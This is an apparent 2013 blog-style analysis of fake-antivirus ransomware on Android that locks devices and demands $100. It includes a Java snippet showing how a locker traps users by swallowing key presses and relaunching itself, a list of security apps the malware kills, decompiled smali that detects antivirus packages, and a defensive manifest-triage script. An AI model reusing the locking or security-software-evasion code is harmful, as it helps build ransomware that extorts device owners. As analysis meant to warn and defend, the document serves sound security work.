
New malware found on the Android platform masquerading as antivirus software and hijacking devices

2013-06-25 10:33
[Android malware: pay $100 or your privacy leaks] News from June 25: security firm Symantec has published a report on new malware discovered on the Android platform that masquerades as antivirus software and hijacks the device; the consumer has to pay $100 before the device works normally again. The malware exploits the consumer's desire for security, misleads them into "removing" fake or nonexistent trojans, and then takes control of the whole device to threaten its owner.

Also, this software is not distributed through Google Play, so everyone should be careful about where they get apps. Don't install from unknown sources; download from a legitimate app store!

The point where software enters the device is the very essence of smart-terminal security!!



Actually, there were samples like this before, forcing users to "donate".... For example, the following code:

// In the locking Activity: swallow every hardware key press so the user cannot leave the screen.
@Override
public boolean onKeyDown(int keyCode, KeyEvent event) {
    return true;
}

// In the locking Activity: when the system tears the activity down, start a service that brings it back.
@Override
protected void onDestroy() {
    super.onDestroy();
    startService(new Intent(getApplicationContext(), RestartService.class));
}

// In the Service (the onCreate() signature without a Bundle is Service's): relaunch the locking activity as soon as the service starts.
@Override
public void onCreate() {
    super.onCreate();
    startActivity(new Intent(getApplicationContext(), MaliciousActivity.class)
            .addFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
}
The code above is for illustration only; do not try this for real....

Here is the ransomware's interface:



It dresses itself up as a saintly warrior, flashes a whole pile of "threats" at once, and then demands protection money...
Package name: com.android.defender.androiddefender
The home-screen icon after installation:



Permissions requested: damn, that's a lot

Access location information, such as Cell-ID or WiFi.
Access location information, such as GPS information.
Access information about networks.
Access information about the WiFi state.
Change network connectivity state.
Change Wi-Fi connectivity state.
Allows applications to disable the keyguard. (lets the app disable the lock screen)
Expand or collapse the status bar.
Access to the list of accounts in the Accounts Service.
Open network connections.
Ends background processes. (kills processes)
Read user's contacts data.
Check the phone's current state.
Read SMS messages on the device.
Start once the device has finished booting. (auto-start)
Open windows.
Make the phone vibrate.
Prevent processor from sleeping or screen from dimming.
Create new contact data.
Write to external storage devices.
Create new SMS messages.
Install a shortcut.

It also activates device administration...
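Taken together, the permission list and the device-admin activation above form a recognisable profile. The following is an added example (my own code, not from this post or from Symantec's report) that scores an AndroidManifest.xml against that profile; the weights, the constructed sample manifest and the receiver name AdminReceiver are assumptions.

```python
# Added example: permission-profile triage for the ransomware described above.
# The weights are my own assumption, not a published scoring scheme.
import xml.etree.ElementTree as ET

NS = "{http://schemas.android.com/apk/res/android}"
# Permission -> (weight, behaviour observed in the analysis above).
INDICATORS = {
    "android.permission.DISABLE_KEYGUARD": (2, "can dismiss the lock screen"),
    "android.permission.KILL_BACKGROUND_PROCESSES": (3, "kills task managers / AV"),
    "android.permission.RECEIVE_BOOT_COMPLETED": (2, "comes back after a reboot"),
    "android.permission.SYSTEM_ALERT_WINDOW": (3, "draws the ransom overlay"),
    "android.permission.READ_SMS": (2, "copies SMS into droidbackup.db"),
    "android.permission.WRITE_EXTERNAL_STORAGE": (1, "can delete downloaded APKs"),
}
DEVICE_ADMIN = "android.permission.BIND_DEVICE_ADMIN"

def triage_manifest(manifest_xml):
    """Return (score, findings) for an AndroidManifest.xml given as a string."""
    root = ET.fromstring(manifest_xml)
    package = root.get("package", "")
    perms = {e.get(NS + "name") for e in root.iter("uses-permission")}
    score, findings = 0, []
    for perm, (weight, note) in INDICATORS.items():
        if perm in perms:
            score += weight
            findings.append(f"{perm}: {note}")
    # A receiver guarded by BIND_DEVICE_ADMIN is how an app becomes a device
    # administrator, which is what makes this family so hard to uninstall.
    if any(r.get(NS + "permission") == DEVICE_ADMIN for r in root.iter("receiver")):
        score += 4
        findings.append("device-admin receiver: resists uninstall")
    # com.android.* naming imitates a system component; only counts alongside the above.
    if package.startswith("com.android.") and findings:
        score += 1
        findings.append(f"{package} imitates a system package")
    return score, findings

# Constructed manifest mirroring the permissions listed above (not the real one);
# the receiver name AdminReceiver is made up.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.android.defender.androiddefender">
  <uses-permission android:name="android.permission.DISABLE_KEYGUARD"/>
  <uses-permission android:name="android.permission.KILL_BACKGROUND_PROCESSES"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <application><receiver android:name=".AdminReceiver"
      android:permission="android.permission.BIND_DEVICE_ADMIN"/></application>
</manifest>"""
```

Running `triage_manifest(SAMPLE_MANIFEST)` yields a score of 17 with seven findings, while a manifest that only asks for INTERNET scores 0.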



It deletes the APKs in these directories... is that to stop you downloading antivirus software?

[EXTERNAL STORAGE MEDIA]/Download
/mnt/external_sd/Download
/mnt/extSdCard/Download

It creates an SQLite database, droidbackup.db, and steals the system's SMS messages into it.

When the device is locked, this screen pops up... what a charlatan!!!



It kills off all its "brother" processes! (the package names it targets:)

com.rechild.advancedtaskkiller
com.estrongs.android.pop
com.metago.astro
com.avast.android.mobilesecurity
com.estrongs.android.taskmanager
com.gau.go.launcherex.gowidget.taskmanagerex
com.gau.go.launcherex
com.rechild.advancedtaskkillerpro
mobi.infolife.taskmanager
com.rechild.advancedtaskkillerfroyo
com.netqin.aotkiller
com.arron.taskManagerFree
com.rhythm.hexise.task

And then... damn, OP is "seriously infected", and even the most popular apps in the world are all "infected"!



Now it starts asking for money!!!



And at a discount price, too...



It is hard to uninstall and blocks other apps from launching; earlier malware already did this. Here is the code from an earlier sample (decompiled smali)!

.method public static b(Landroid/content/Context;)Ljava/lang/String;
    .locals 4
    const/4 v2, 0x0
    # the encrypted regular expression to match the package name of security software
    # (^com\.qihoo360\.mobilesafe$)|(^com\.tencent\.qqpimsecure$)|(^com\.lbe\.security$)
    const-string v0, "ZkBw8CLr9ek1HtMhfN7YKvBg8CF18t3N7xzRFvRAZkBw8CLr9eiR8I0R8eir9eksrtRgrC3wuKFRFvRAZkBw8CLr9IsWz3YOrC3wuKF1uoDDZl__"
    # decrypt this string
    invoke-static {v0}, Lcom/sec/android/providers/drm/However;->d(Ljava/lang/String;)Ljava/lang/String;
    move-result-object v0
    invoke-virtual {p0}, Landroid/content/Context;->getPackageManager()Landroid/content/pm/PackageManager;
    move-result-object v1
    invoke-virtual {v1, v2}, Landroid/content/pm/PackageManager;->getInstalledPackages(I)Ljava/util/List;
    move-result-object v1
    :goto_0
    invoke-interface {v1}, Ljava/util/List;->size()I
    move-result v3
    # traverse the list of installed packages
    if-ge v2, v3, :cond_1
    invoke-interface {v1, v2}, Ljava/util/List;->get(I)Ljava/lang/Object;
    move-result-object p0
    check-cast p0, Landroid/content/pm/PackageInfo;
    iget-object v3, p0, Landroid/content/pm/PackageInfo;->packageName:Ljava/lang/String;
    invoke-static {v3, v0}, Lcom/sec/android/providers/drm/However;->a(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
    move-result-object v3
    if-eqz v3, :cond_0
    iget-object v0, p0, Landroid/content/pm/PackageInfo;->packageName:Ljava/lang/String;
    :goto_1
    # found the security software: return its package name
    return-object v0
    :cond_0
    # otherwise, check the next package
    add-int/lit8 v2, v2, 0x1
    goto :goto_0
    :cond_1
    const/4 v0, 0x0
    goto :goto_1
.end method

It even modifies system settings so that not even a factory data reset works. Analysis of those last two points will have to wait for my source-code write-up.